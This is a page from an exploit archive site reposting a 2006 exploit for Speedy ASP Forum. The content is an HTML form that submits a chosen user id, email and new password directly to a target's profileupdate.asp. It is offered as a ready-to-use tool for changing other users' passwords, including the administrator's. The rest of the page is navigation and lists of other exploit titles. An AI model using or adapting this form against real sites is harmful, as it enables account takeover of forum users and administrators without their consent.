首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Speedy ASP Forum (profileupdate.asp) User Pass Change Exploit
来源:vfocus.net 作者:vfocus 发布时间:2006-05-30  

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>

<div bgcolor="#000000">
<form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm("You are submitting information to an external page.\nAre you sure?");">
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User
Name
: </b></font>
<input type="text" name="name" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname
Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Mail
: </b></font>
<input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>

<font face="Verdana" size="2" color="#FF0000"><b>User
Ýd
: </b></font>
<input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1
Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country :
</b>
</font>
<select size="1" name="country">
<option value="0">Choose Country</option>
<option value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial"> Example:
Turkey</font><br>

<b>

<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000">
: </font></b>

<input type="text" name="password" value="Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">
: </font></b>

<input type="text" name="passwordre" value="Re Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>

<font face="Verdana" size="2" color="#FF0000"><b>Form Action :
</b>
</font>

<input type="text" name="adres" value="profileupdate.asp" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
http://[target]/[path]/profileu<WBR>pdate.asp</font></p>

<p>

<input type="submit" name="Submit" value="Change"> </p>

<br>

</form>

</div></body></html>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Eggblog <= 3.x Remote (SQL
·gxine 0.5.6 (HTTP Plugin) Remo
·MS Internet Explorer (HTML Tag
·pppBlog <= 0.3.8 (randompic
·WordPress <= 2.0.2 (cache)
·MS Windows XP/w2k3 (Explorer.e
·Novell eDirectory 8.8 Long URI
·TinyPHP Forum <= 3.6 (profi
·Drupal <= 4.7 (attachment m
·aspWebLinks 2.0 Remote SQL Inj
·Nucleus CMS <= 3.22 (DIR_LI
·LifeType <= 1.0.4 SQL Injec
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved